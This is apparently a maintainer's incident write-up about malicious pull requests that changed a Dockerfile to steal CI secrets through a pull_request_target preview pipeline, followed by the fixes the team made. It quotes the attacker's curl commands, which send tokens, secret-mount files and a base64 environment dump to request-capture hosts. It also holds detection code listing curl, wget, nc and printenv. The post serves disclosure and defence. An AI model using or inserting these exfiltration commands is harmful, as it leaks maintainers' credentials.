Yesterday I saw a new PR on our open-source repo. The title was just "t", and there were actually 7 PRs like it. The descriptions were all empty, and the GitHub account didn't look legit either: it was recently created and named arc-switch.

This is a small post to document what happened and what we changed.

The PR

nao is open-source. We get PRs from external contributors every day, and we decided a while ago to deploy a preview of each PR so we can test it during the review process. To do that, the CI pipeline builds the corresponding Docker image and deploys it to a preview VM.

So yesterday the attacker (let's call him that) opened 7 PRs that changed the Dockerfile to try to exfiltrate our secrets and environment variables. Because of the preview feature, the CI pipeline ran, built the Docker image and deployed it to our preview environment, which means the attacker was able to exfiltrate some temporary secrets and some keys.

Before I go into the details: we have already rotated the 2 important keys that were exposed, an OpenAI API key and a GitHub OAuth secret. The rest was mainly temporary secrets or public stuff.

The attacker tried several ways to exfiltrate the secrets via the Dockerfile. He added several kinds of lines to it, all of which tried to send data to a public URL with curl.

The first change tried to get the GITHUB_TOKEN with a simple:

RUN echo $GITHUB_TOKEN | curl -X POST -d @- https://[redacted].requestrepo.com

It takes the content of the GITHUB_TOKEN environment variable and sends it to a public website where you can see the content of every request hitting that specific URL.

Then he tried to dump the whole build environment with printenv:

RUN printenv | base64 | curl -X POST -d @-  https://[redacted].requestrepo.com

Then he tried to read other kinds of secrets through Docker build secret mounts (of all the secrets listed below, only GITHUB_TOKEN is actually available as a mounted secret):

RUN --mount=type=secret,id=GITHUB_TOKEN \
    --mount=type=secret,id=GH_TOKEN \
    --mount=type=secret,id=NPM_TOKEN \
    --mount=type=secret,id=DOCKERHUB_TOKEN \
    --mount=type=secret,id=OPENAI_API_KEY \
    --mount=type=secret,id=ANTHROPIC_API_KEY \
    sh -c 'for s in GITHUB_TOKEN GH_TOKEN NPM_TOKEN DOCKERHUB_TOKEN OPENAI_API_KEY ANTHROPIC_API_KEY; do [ -f "/run/secrets/$s" ] && curl -X POST https://lvfqk2pj.requestrepo.com -H "Content-Type: text/plain" --data "$(printf "%s:" "$s"; base64 -w0 "/run/secrets/$s")" || true; done'

And the last one (which was the scariest) replaced the container's default command (CMD) so that, at runtime, the container sends all its environment variables to the same kind of URL:

CMD sh -c "printenv | base64 | curl -X POST -d @-  https://lvfqk2pj.requestrepo.com"

Why it worked and what got stolen

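The reason it worked is simple: our pr-preview CI pipeline runs on the pull_request_target event, which is a well-known attack vector for open-source repos. Workflows triggered by this event run in the context of the base repository, so they get access to its secrets and a GITHUB_TOKEN that can have write permissions, even when the PR comes from a fork. Since our pipeline then built and deployed the Dockerfile from the PR, the PR author's code ran with access to those secrets. We learned it the hard way. If I'm not mistaken, it was the same kind of attack TanStack got hit by a few weeks ago.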
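The risky combination described here (a pull_request_target trigger plus building the PR's own code) can be checked for mechanically. The following is a minimal sketch, not our actual tooling: the function name is hypothetical, and it assumes the workflow checks out the PR head through the github.event.pull_request.head.sha or .ref expression. It is a plain text match, so it will miss other ways of fetching PR code and will also match commented-out lines.

```python
import re

# Matches the trigger name as a whole word.
TARGET_TRIGGER = re.compile(r"\bpull_request_target\b")
# Assumption: the PR head is checked out via one of these context expressions.
PR_HEAD_REF = re.compile(r"github\.event\.pull_request\.head\.(sha|ref)")


def risky_pull_request_target(workflow_text: str) -> bool:
    """Return True if the workflow uses pull_request_target AND references the PR head."""
    uses_target = TARGET_TRIGGER.search(workflow_text) is not None
    uses_pr_head = PR_HEAD_REF.search(workflow_text) is not None
    return uses_target and uses_pr_head


if __name__ == "__main__":
    # Illustrative workflow snippet, not our real pr-preview workflow.
    example = """
on:
  pull_request_target:
jobs:
  preview:
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
"""
    print(risky_pull_request_target(example))
```

A check like this only flags workflows for a human to look at; whether a flagged workflow is actually exploitable still depends on which secrets and permissions the job has.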

The damage was limited: of all the secrets and environment variables exposed, the only sensitive ones were OPENAI_API_KEY and GITHUB_CLIENT_SECRET, and we quickly rotated them. All the others were disposable or public.

What we changed

To avoid this kind of attack we added a gate to the pr-preview CI pipeline. We already have an APPROVED_CONTRIBUTORS file in the repo that lists the contributors we approved through an lgtm process when they opened an issue (the same way the Pi agent does it).

So now only contributors listed in APPROVED_CONTRIBUTORS can trigger a preview build, meaning we only do it for trusted contributors.
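As a rough illustration of such a gate, here is a minimal sketch. It is not our actual implementation: the file format (one GitHub login per line, optional leading "@", "#" for comments) and both function names are assumptions made for the example.

```python
def parse_approved(text: str) -> set[str]:
    """Parse an allow-list with one login per line (assumed format)."""
    approved = set()
    for line in text.splitlines():
        # Drop trailing comments, surrounding whitespace and an optional "@".
        login = line.split("#", 1)[0].strip().lstrip("@")
        if login:
            # GitHub logins are case-insensitive, so normalize to lowercase.
            approved.add(login.lower())
    return approved


def may_build_preview(pr_author: str, approved: set[str]) -> bool:
    """Return True only when the PR author is on the allow-list."""
    return pr_author.strip().lower() in approved


if __name__ == "__main__":
    # Hypothetical file content; "alice" and "bob" are placeholder logins.
    approved = parse_approved("# maintainers\nalice\n@Bob  # approved via issue\n")
    print(may_build_preview("Alice", approved))       # approved contributor
    print(may_build_preview("arc-switch", approved))  # unknown account
```

One design point matters more than the code itself: the list has to be read from the base branch, not from the PR's checkout. Otherwise a PR could simply add its own author to the file and pass the gate.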

A complementary option would be to add a second gate that reviews the PR content for security issues (using an LLM) and only lets the pipeline continue if the PR looks safe. I think it would combine well with the first gate.
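To make the idea of a content gate concrete, here is a much simpler stand-in: a regex heuristic, not the LLM review described above. It scans the lines a PR adds in a unified diff and flags the patterns seen in this attack. The pattern list and function name are assumptions chosen for illustration, and legitimate Dockerfiles also use curl, so a match should trigger human review rather than an automatic rejection.

```python
import re

# Hypothetical pattern list, derived from the lines the attacker added.
SUSPICIOUS_PATTERNS = {
    "network call in build": re.compile(r"\b(curl|wget|nc)\b"),
    "environment dump": re.compile(r"\b(printenv|env)\b\s*\|"),
    "secret mount": re.compile(r"--mount=type=secret"),
    "request-capture host": re.compile(r"requestrepo\.com"),
}


def flag_added_lines(diff_text: str) -> list[tuple[str, str]]:
    """Return (label, line) pairs for added diff lines matching a pattern."""
    findings = []
    for line in diff_text.splitlines():
        # Keep only added lines; skip the "+++ b/file" header.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        added = line[1:]
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(added):
                findings.append((label, added.strip()))
    return findings


if __name__ == "__main__":
    # Illustrative diff; example.invalid is a placeholder host.
    diff = "\n".join([
        "--- a/Dockerfile",
        "+++ b/Dockerfile",
        " FROM node:20",
        "+RUN printenv | base64 | curl -X POST -d @- https://example.invalid",
    ])
    for label, line in flag_added_lines(diff):
        print(f"{label}: {line}")
```

A heuristic like this is easy to evade (for example by hiding the call in a script the Dockerfile copies in), which is one reason to treat it as a complement to the contributor gate and not a replacement.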

Conclusion

This post is mainly a write-up of what happened and what we changed. I think this kind of attack happens a lot, but it's the first one for us, and we are building security gates as we move forward with our open-source project. Another lesson: I had turned off most GitHub notifications because they used to spam me too much, but GitHub has become my home since we embarked on the open-source journey, so I saw the PRs as they came in and was able to react quickly.

The most terrifying part is that today the PRs have disappeared and the GitHub account has also been deleted. So this is the kind of attack that can happen without you even noticing.